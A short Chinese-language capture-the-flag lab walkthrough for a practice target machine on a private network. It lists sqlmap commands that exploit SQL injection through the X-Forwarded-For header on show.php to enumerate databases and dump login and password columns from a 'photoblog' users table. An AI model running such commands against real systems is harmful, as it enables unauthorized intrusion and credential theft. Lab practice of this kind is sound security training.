CTF实战_008

靶机环境
链接：https://pan.baidu.com/s/1gFYJQptMSexA4ftyrV-qGw 提取码：ntis
kali IP ：192.168.124.151
靶机IP：192.168.124.148

Awvs 安装

sqlmap 获取  X-Forwarded-For注入数据

sqlmap -u "http://192.168.124.148/show.php" --headers="X-Forwarded-For:*" --batch
查看sqlmap 是否能处理漏洞
sqlmap -u "http://192.168.124.148/show.php" --headers="X-Forwarded-For:*" --dbs --batch
查看数据库
sqlmap -u "http://192.168.124.148/show.php" --headers="X-Forwarded-For:*" -D "photoblog" --tables --batch
查看表
sqlmap -u "http://192.168.124.148/show.php" --headers="X-Forwarded-For:*" -D "photoblog" -T "users" --columns --batch
查看字段
sqlmap -u "http://192.168.124.148/show.php" --headers="X-Forwarded-For:*" -D "photoblog" -T "users" -C "login,password" --dump --batch
查看值